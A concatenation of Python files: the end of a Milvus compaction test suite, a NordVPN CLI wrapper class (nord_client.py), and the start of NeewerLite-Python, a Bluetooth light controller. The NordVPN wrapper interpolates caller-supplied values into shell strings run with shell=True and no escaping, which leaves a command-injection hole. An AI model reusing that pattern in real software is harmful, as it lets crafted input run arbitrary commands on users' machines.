method: 1.insert data and get ts
2.delete all ids
4.compact
5.search with ts
expected: Verify search result
"""
from pymilvus import utility
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
# insert and get tt
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
tt = utility.mkts_from_hybridts(insert_res.timestamp, milliseconds=0.)
# delete all
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys}'
delete_res, _ = collection_w.delete(expr)
log.debug(collection_w.num_entities)
collection_w.compact()
collection_w.load()
search_one, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
assert 0 in search_one[0].ids
@pytest.mark.tags(CaseLabel.L3)
def test_compact_delete_outside_time_travel(self):
"""
target: test compact outside time_travel range
method: 1.create and insert
2.get time stamp
3.delete
4.compact after compact_retention_duration
5.load and search with travel time tt
expected: Empty search result
But no way to verify, because travel time does not support travel back to retentionDuration ago so far
"""
from pymilvus import utility
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
# insert
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
tt = utility.mkts_from_hybridts(insert_res.timestamp, milliseconds=0.)
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys}'
delete_res, _ = collection_w.delete(expr)
log.debug(collection_w.num_entities)
# ensure compact remove delta data that delete outside retention range
# sleep(ct.compact_retention_duration)
sleep(60)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.load()
# search with travel_time tt
search_res, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
log.debug(search_res[0].ids)
assert len(search_res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_compact_merge_two_segments(self):
"""
target: test compact merge two segments
method: 1.create with shard_num=1
2.insert and flush
3.insert and flush again
4.compact
5.load
expected: Verify segments are merged
"""
num_of_segment = 2
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment, tmp_nb)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
# verify the two segments are merged into one
assert len(c_plans.plans) == 1
assert len(c_plans.plans[0].sources) == 2
target = c_plans.plans[0].target
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert target == segment_info[0].segmentID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_no_merge(self):
"""
target: test compact when no segments merge
method: 1.create with shard_num=1
2.insert and flush
3.compact and search
expected: No exception and no compact plans
"""
# create collection
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans, _ = collection_w.get_compaction_plans()
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_compact_manual_and_auto(self):
"""
target: test compact manual and auto
method: 1.create with shard_num=1
2.insert one and flush (11 times)
3.compact
4.load and search
expected: Verify segments info
"""
# greater than auto-merge threshold 10
num_of_segment = ct.compact_segment_num_threshold + 1
# create collection shard_num=1, insert 11 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=num_of_segment)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()[0]
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == 1
@pytest.mark.tags(CaseLabel.L1)
def test_compact_merge_multi_segments(self):
"""
target: test compact and merge multi small segments
method: 1.create with shard_num=1
2.insert one and flush (less than threshold)
3.compact
4.load and search
expected: Verify segments info
"""
# less than auto-merge threshold 10
num_of_segment = ct.compact_segment_num_threshold - 1
# create collection shard_num=1, insert 11 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=num_of_segment)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans[0].sources) == num_of_segment
target = c_plans.plans[0].target
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == 1
assert segments_info[0].segmentID == target
@pytest.mark.tags(CaseLabel.L2)
def test_compact_merge_inside_time_travel(self):
"""
target: test compact and merge segments inside time_travel range
method: search with time travel after merge compact
expected: Verify segments inside time_travel merged
"""
from pymilvus import utility
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
# insert twice
df1 = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df1)[0]
assert collection_w.num_entities == tmp_nb
df2 = cf.gen_default_dataframe_data(tmp_nb, start=tmp_nb)
insert_two = collection_w.insert(df2)[0]
assert collection_w.num_entities == tmp_nb * 2
tt = utility.mkts_from_hybridts(insert_two.timestamp, milliseconds=0.1)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()[0]
collection_w.load()
search_res, _ = collection_w.search(df2[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
assert tmp_nb in search_res[0].ids
assert len(search_res[0]) == ct.default_limit
@pytest.mark.tags(CaseLabel.L2)
def test_compact_threshold_auto_merge(self):
"""
target: test num (segment_size < 1/2Max) reaches auto-merge threshold 10
method: 1.create with shard_num=1
2.insert flush 10 times (merge threshold 10)
3.wait for compaction, load
expected: Get query segments info to verify segments auto-merged into one
"""
threshold = ct.compact_segment_num_threshold
# create collection shard_num=1, insert 10 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=threshold)
# Estimated auto-merging takes 30s
cost = 60
collection_w.load()
start = time()
while True:
sleep(5)
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
# verify segments reaches threshold, auto-merge ten segments into one
if len(segments_info) == 1:
break
end = time()
if end - start > cost:
raise BaseException(1, "Compact auto-merge more than 60s")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_less_threshold_no_merge(self):
"""
target: test compact the num of segments that size less than 1/2Max, does not reach the threshold
method: 1.create collection with shard_num = 1
2.insert flush 9 times (segments threshold 10)
3.after a while, load
expected: Verify segments are not merged
"""
less_threshold = ct.compact_segment_num_threshold - 1
# create collection shard_num=1, insert 9 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=less_threshold)
sleep(3)
# load and verify no auto-merge
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == less_threshold
@pytest.mark.skip(reason="Todo")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_multi_collections(self):
"""
target: test compact multi collections with merge
method: create 50 collections, add entities into them and compact in turn
expected: No exception
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_insert(self):
"""
target: test insert after compact
method: 1.create and insert with flush
2.delete and compact
3.insert new data
4.load and search
expected: Verify search result and segment info
"""
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=tmp_nb)
# compact two segments
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# insert new data, verify insert flush successfully
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb * 3
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_delete(self):
"""
target: test delete after compact
method: 1.delete half and compact
2.load and query
3.delete and query
expected: Verify deleted ids
"""
# init collection with one shard, insert into two segments
collection_w = self.collection_insert_multi_segments_one_shard(prefix, is_dup=False)
# compact and complete
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# delete and query
expr = f'{ct.default_int64_field_name} in {[0]}'
collection_w.delete(expr)
collection_w.load()
collection_w.query(expr, check_task=CheckTasks.check_query_empty)
expr_1 = f'{ct.default_int64_field_name} in {[1]}'
collection_w.query(expr_1, check_task=CheckTasks.check_query_results, check_items={'exp_res': [{'int64': 1}]})
@pytest.mark.tags(CaseLabel.L1)
def test_compact_cross_shards(self):
"""
target: test compact cross shards
method: 1.create with shard_num=2
2.insert once and flush (two segments, belonging to two shards)
3.compact and completed
expected: Verify no compact
"""
# insert into two segments with two shard
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=2)
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed(timeout=1)
c_plans = collection_w.get_compaction_plans()[0]
# Actually no merged
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_compact_cross_partition(self):
"""
target: test compact cross partitions
method: 1.create with shard_num=1
2.create partition and insert, flush
3.insert _default partition and flush
4.compact
expected: Verify no compact
"""
# create collection and partition
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
partition_w = self.init_partition_wrap(collection_wrap=collection_w)
# insert
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
partition_w.insert(df)
assert collection_w.num_entities == tmp_nb * 2
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
# Actually no merged
assert len(c_plans.plans) == 0
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert segments_info[0].partitionID != segments_info[-1].partitionID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_during_insert(self):
"""
target: test compact during insert and flush
method: 1.insert entities into multi segments
2.start a thread to load and search
3.compact collection
expected: Search and compact both successfully
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
df = cf.gen_default_dataframe_data()
def do_flush():
collection_w.insert(df)
log.debug(collection_w.num_entities)
# compact during insert
t = threading.Thread(target=do_flush, args=())
t.start()
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
t.join()
collection_w.load()
seg_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(seg_info) == 2
@pytest.mark.tags(CaseLabel.L2)
def test_compact_during_index(self):
"""
target: test compact during index
method: while compact collection start a thread to creat index
expected: No exception
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
def do_index():
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
assert collection_w.index()[0].params == ct.default_index
# compact during index
t = threading.Thread(target=do_index, args=())
t.start()
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
t.join()
collection_w.load()
seg_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(seg_info) == 1
|
nord_client.py
|
from subprocess import Popen, PIPE
from threading import Thread
import webbrowser
import re
class NordClient(object):
def __init__(self, error_cb=None):
if error_cb:
self.error_cb = error_cb
else:
self.error_cb = self._base_error
self.account_information = ""
self.email = ""
self.vpn_service = ""
self.status_dict = {}
self.version = ""
self.country_dict = {}
self.group_list = []
self.settings_dict = {}
self.logged_in = False
self.cancel_login = False
self._base_cmd = "nordvpn"
self._account = "account"
self._add = "add"
self._all = "all"
self._cities = "cities"
self._connect = "connect"
self._countries = "countries"
self._disable = "disable"
self._disconnect = "disconnect"
self._dns = "dns"
self._enable = "enable"
self._groups = "groups"
self._login = "login"
self._logout = "logout"
self._rate = "rate"
self._register = "register"
self._remove = "remove"
self._port = "port"
self._protocol = "protocol"
self._set = "set"
self._settings = "settings"
self._status = "status"
self._subnet = "subnet"
self._technology = "technology"
self._whitelist = "whitelist"
self._help = "help"
self._version = "version"
self.get_countries()
self.get_groups()
self.get_settings()
self.get_account_info()
self.get_status()
self.get_version()
def add_whitelist_subnet(self, subnet, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._add} {self._subnet} {subnet}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def add_whitelist_port(self, port, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._add} {self._port} {port}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def get_groups(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._groups}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_groups_resp, self._base_error_cb)
def get_groups_resp(self, output):
print(f"hello {output}")
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return []
try:
group_list = output.replace(",", "").split()
group_list = list(filter(('-').__ne__, group_list))
self.group_list = group_list
except:
self.error_cb("Failed to parse group. Found: ", output)
return group_list
def get_countries(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._countries}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_countries_resp, self._base_error_cb)
def get_countries_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.country_dict
try:
country_list = output.replace(",", "").split()
country_list = list(filter(('-').__ne__, country_list))
for country in country_list:
cmd = f"{self._base_cmd} {self._cities} {country}"
outs, err = self._send_dir_command(cmd)
city_list = []
if outs:
city_list = outs.replace(",", "").split()
city_list = list(filter(('-').__ne__, city_list))
self.country_dict[country] = city_list
except:
self.error_cb("Failed to parse Country list. Found: ", output)
return self.country_dict
def get_version(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._version}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_version_resp, self._base_error_cb)
def get_version_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return ""
self.version = output
return self.version
def get_status(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._status}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_status_resp, self._base_error_cb)
def get_status_resp(self, output):
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.status_dict
try:
rsp_list = output.split("\n")
for item in rsp_list:
if item:
key, value = item.split(":")
key_list = key.split()
key_list = list(filter(('-').__ne__, key_list))
if len(key_list) > 1:
key_list = [f"{key_list[0]}_{key_list[1]}"]
self.status_dict[key_list[0]] = value
except:
self.error_cb("Failed to parse Status. Found: ", output)
return self.status_dict
def get_settings(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._settings}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_settings_resp, self._base_error_cb)
def get_settings_resp(self, output):
self.settings_dict = {}
self.settings_dict["Whitelisted_subnets"] = []
self.settings_dict["Whitelisted_ports"] = []
if "Please check your internet connection and try again." in output:
self.error_cb("", output)
return self.settings_dict
try:
rsp_list = output.split("\n")
for item in rsp_list:
if "Whitelisted" in item:
pass
elif ":" in item:
key, value = item.split(":")
key.replace(" ", "_")
key_list = key.split()
key_list = list(filter(('-').__ne__, key_list))
if len(key_list) > 1:
key_list = [f"{key_list[0]}_{key_list[1]}"]
self.settings_dict[key_list[0]] = value.replace(" ", "")
elif re.match(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", item.strip()):
self.settings_dict["Whitelisted_subnets"].append(item.strip())
elif re.match(r"\d{1,6}", item.strip().replace("(UDP|TCP)", "")):
self.settings_dict["Whitelisted_ports"].append(item.strip())
except:
self.error_cb("Failed to parse Settings. Found: ", output)
return self.settings_dict
def get_account_info(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._account}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.get_account_rsp, self._base_error_cb)
def get_account_rsp(self, output):
if "You are not logged in." not in output:
self.logged_in = True
else:
return None, None, None
try:
rsp_list = output.split("\n")
self.account_information = rsp_list[0].split("Account Information:")[-1]
self.email = rsp_list[1].split("Email Address: ")[-1]
self.vpn_service = rsp_list[2].split("VPN Service: ")[-1]
except:
self.account_information = ""
self.email = ""
self.vpn_service = ""
return self.account_information, self.email, self.vpn_service
def connect(self, selection, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._connect} {selection}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def connect_rsp(self, output):
pass
def connect_to_country(self, country, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect} {country}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def connect_to_city(self, city, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect} {city}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def quick_connect(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._connect}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.connect_rsp, self._base_error_cb)
def disconnect(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._disconnect}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.disconnect_rsp, self._base_error_cb)
def disconnect_rsp(self, output):
pass
def login(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._login}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.login_success, self._base_error_cb)
def login_rsp(self, output):
if "You are not logged in." not in output:
self.logged_in = True
def logout(self, success_cb, error_cb):
cmd = f"{self._base_cmd} {self._logout}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self.login_rsp, self._base_error_cb)
def login_success(self, output):
if output == "You are already logged in.":
pass
else:
url = output.split("Continue in the browser: ")[1]
webbrowser.open(url)
def _base_error_cb(self, error_cb):
print(error_cb)
pass
def _base_success_cb(self, error_cb):
pass
def remove_all_whitelist(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def remove_all_whitelist_port(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._port} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def remove_all_whitelist_subnet(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._subnet} {self._all}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def remove_whitelist_port(self, port, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._port} {port}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def remove_whitelist_subnet(self, subnet, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._remove} {self._subnet} {subnet}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb(), self._base_error_cb)
def _send_dir_command(self, cmd):
process = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)
output, error = process.communicate()
return output.decode("utf-8"), error.decode("utf-8")
def _send_command(self, *args):
cmd = args[0]
print(f"Sending Command: {cmd}")
success_cb = args[1]
error_cb = args[2]
process = Popen([cmd], stdout=PIPE, stderr=PIPE, shell=True)
output, error = process.communicate()
if error:
print(f"Error: {str(error.decode('utf-8'))}")
error_cb(str(error.decode("utf-8")))
else:
print(f"Out: {str(output.decode('utf-8'))}")
success_cb(str(output.decode("utf-8")))
def set_dns(self, dns, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._dns} {dns}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_setting_enabled(self, setting, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {setting} {self._enable}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_setting_disabled(self, setting, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {setting} {self._disable}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_protocol(self, protocol, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._protocol} {protocol}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def set_technology(self, technology, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._set} {self._technology} {technology}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def _setup_thread(self, cmd, succes_cb, error_cb):
thread = None
if succes_cb:
thread = Thread(target=self._send_command, args=(cmd, succes_cb, error_cb))
return thread
def _base_error(self, error):
print(error)
|
NeewerLite-Python.py
|
#############################################################
## NeewerLite-Python
## by Zach Glenwright
#############################################################
## > https://github.com/taburineagle/NeewerLite-Python/ <
#############################################################
## A cross-platform Python script using the bleak and
## PySide2 libraries to control Neewer brand lights via
## Bluetooth on multiple platforms -
## Windows, Linux/Ubuntu, MacOS and RPi
#############################################################
## Based on the NeewerLight project by @keefo (Xu Lian)
## > https://github.com/keefo/NeewerLite <
#############################################################
import os
import sys
import tempfile
import argparse
import platform # used to determine which OS we're using for MAC address/GUID listing
import asyncio
import threading
import time
from datetime import datetime
# IMPORT BLEAK (this is the library that allows the program to communicate with the lights) - THIS IS NECESSARY!
try:
from bleak import BleakScanner, BleakClient
except ModuleNotFoundError as e:
print(" ===== CAN NOT FIND BLEAK LIBRARY =====")
print(" You need the bleak Python package installed to use NeewerLite-Python.")
print(" Bleak is the library that connects the program to Bluetooth devices.")
print(" Please install the Bleak package first before running NeewerLite-Python.")
print()
print(" To install Bleak, run either pip or pip3 from the command line:")
print(" pip install bleak")
print(" pip3 install bleak")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/bleak/")
sys.exit(1) # you can't use the program itself without Bleak, so kill the program if we don't have it
# IMPORT THE WINDOWS LIBRARY (if you don't do this, it will throw an exception on Windows only)
if platform.system() == "Windows": # try to load winrt if we're on Windows
try:
from winrt import _winrt
_winrt.uninit_apartment()
except Exception as e:
pass # if there is an exception to this module loading, you're not on Windows
importError = 0 # whether or not there's an issue loading PySide2 or the GUI file
# IMPORT PYSIDE2 (the GUI libraries)
try:
from PySide2.QtCore import Qt, QItemSelectionModel
from PySide2.QtGui import QLinearGradient, QColor, QKeySequence
from PySide2.QtWidgets import QApplication, QMainWindow, QTableWidgetItem, QShortcut, QMessageBox
except Exception as e:
importError = 1 # log that we can't find PySide2
# IMPORT THE GUI ITSELF
try:
from ui_NeewerLightUI import Ui_MainWindow
except Exception as e:
if importError != 1: # if we don't already have a PySide2 issue
importError = 2 # log that we can't find the GUI file - which, if the program is downloaded correctly, shouldn't be an issue
# IMPORT THE HTTP SERVER
try:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
except Exception as e:
pass # if there are any HTTP errors, don't do anything yet
CCTSlider = -1 # the current slider moved in the CCT window - 1 - Brightness / 2 - Hue / -1 - Both Brightness and Hue
sendValue = [120, 135, 2, 20, 56, 157] # an array to hold the values to be sent to the light - the default is CCT / 5600K / 20%
lastAnimButtonPressed = 1 # which animation button you clicked last - if none, then it defaults to 1 (the police sirens)
lastSelection = [] # the current light selection (this is for snapshot preset entering/leaving buttons)
lastSortingField = -1 # the last field used for sorting purposes
availableLights = [] # the list of Neewer lights currently available to control
# List Subitems (for ^^^^^^):
# [0] - Bleak Scan Object (can use .name / .rssi / .address to get specifics)
# [1] - Bleak Connection (the actual Bluetooth connection to the light itself)
# [2] - Custom Name for Light (string)
# [3] - Last Used Parameters (list)
# [4] - Whether or not to use an Extended CCT Range (boolean)
# [5] - Whether or not to send Brightness and Hue independently for old lights (boolean)
# [6] - Whether or not this light has been manually turned ON/OFF (boolean)
# [7] - The Power and Channel data returned for this light (list)
# Light Preset ***Default*** Settings (for sections below):
# NOTE: The list is 0-based, so the preset itself is +1 from the subitem
# [0] - [CCT mode] - 5600K / 20%
# [1] - [CCT mode] - 3200K / 20%
# [2] - [CCT mode] - 5600K / 0% (lights are on, but set to 0% brightness)
# [3] - [HSI mode] - 0° hue / 100% saturation / 20% intensity (RED)
# [4] - [HSI mode] - 240° hue / 100% saturation / 20% intensity (BLUE)
# [5] - [HSI mode] - 120° hue / 100% saturation / 20% intensity (GREEN)
# [6] - [HSI mode] - 300° hue / 100% saturation / 20% intensity (PURPLE)
# [7] - [HSI mode] - 160° hue / 100% saturation / 20% intensity (CYAN)
# The list of **default** light presets for restoring and checking against
defaultLightPresets = [
[[-1, [5, 20, 56]]],
[[-1, [5, 20, 32]]],
[[-1, [5, 0, 56]]],
[[-1, [4, 20, 0, 100]]],
[[-1, [4, 20, 240, 100]]],
[[-1, [4, 20, 120, 100]]],
[[-1, [4, 20, 300, 100]]],
[[-1, [4, 20, 160, 100]]]
]
# A list of preset mode settings - custom file will overwrite
customLightPresets = [
[[-1, [5, 20, 56]]],
[[-1, [5, 20, 32]]],
[[-1, [5, 0, 56]]],
[[-1, [4, 20, 0, 100]]],
[[-1, [4, 20, 240, 100]]],
[[-1, [4, 20, 120, 100]]],
[[-1, [4, 20, 300, 100]]],
[[-1, [4, 20, 160, 100]]]
]
threadAction = "" # the current action to take from the thread
setLightUUID = "69400002-B5A3-F393-E0A9-E50E24DCCA99" # the UUID to send information to the light
notifyLightUUID = "69400003-B5A3-F393-E0A9-E50E24DCCA99" # the UUID for notify callbacks from the light
receivedData = "" # the data received from the Notify characteristic
# SET FROM THE PREFERENCES FILE ON LAUNCH
findLightsOnStartup = True # whether or not to look for lights when the program starts
autoConnectToLights = True # whether or not to auto-connect to lights after finding them
printDebug = True # show debug messages in the console for all of the program's events
maxNumOfAttempts = 6 # the maximum attempts the program will attempt an action before erroring out
rememberLightsOnExit = False # whether or not to save the currently set light settings (mode/hue/brightness/etc.) when quitting out
rememberPresetsOnExit = True # whether or not to save the custom preset list when quitting out
acceptable_HTTP_IPs = [] # the acceptable IPs for the HTTP server, set on launch by prefs file
customKeys = [] # custom keymappings for keyboard shortcuts, set on launch by the prefs file
whiteListedMACs = [] # whitelisted list of MAC addresses to add to NeewerLite-Python
enableTabsOnLaunch = False # whether or not to enable tabs on startup (even with no lights connected)
lockFile = tempfile.gettempdir() + os.sep + "NeewerLite-Python.lock"
anotherInstance = False # whether or not we're using a new instance (for the Singleton check)
globalPrefsFile = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "NeewerLite-Python.prefs" # the global preferences file for saving/loading
customLightPresetsFile = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "customLights.prefs"
# FILE LOCKING FOR SINGLE INSTANCE
def singleInstanceLock():
global anotherInstance
try:
lf = os.open(lockFile, os.O_WRONLY | os.O_CREAT | os.O_EXCL) # try to get a file spec to lock the "running" instance
with os.fdopen(lf, 'w') as lockfile:
lockfile.write(str(os.getpid())) # write the PID of the current running process to the temporary lockfile
except IOError: # if we had an error acquiring the file descriptor, the file most likely already exists.
anotherInstance = True
def singleInstanceUnlockandQuit(exitCode):
try:
os.remove(lockFile) # try to delete the lockfile on exit
except FileNotFoundError: # if another process deleted it, then just error out
printDebugString("Lockfile not found in temp directory, so we're going to skip deleting it!")
sys.exit(exitCode) # quit out, with the specified exitCode
def doAnotherInstanceCheck():
if anotherInstance == True: # if we're running a 2nd instance, but we shouldn't be
print("You're already running another instance of NeewerLite-Python.")
print("Please close that copy first before opening a new one.")
print()
print("To force opening a new instance, add --force_instance to the command line.")
sys.exit(1)
try: # try to load the GUI
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setupUi(self) # set up the main UI
self.connectMe() # connect the function handlers to the widgets
if enableTabsOnLaunch == False: # if we're not supposed to enable tabs on launch, then disable them all
self.ColorModeTabWidget.setTabEnabled(0, False) # disable the CCT tab on launch
self.ColorModeTabWidget.setTabEnabled(1, False) # disable the HSI tab on launch
self.ColorModeTabWidget.setTabEnabled(2, False) # disable the SCENE tab on launch
self.ColorModeTabWidget.setTabEnabled(3, False) # disable the LIGHT PREFS tab on launch
self.ColorModeTabWidget.setCurrentIndex(0)
if findLightsOnStartup == True: # if we're set up to find lights on startup, then indicate that
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
else:
self.statusBar.showMessage("Welcome to NeewerLite-Python! Hit the Scan button above to scan for lights.")
if platform.system() == "Darwin": # if we're on MacOS, then change the column text for the 2nd column in the light table
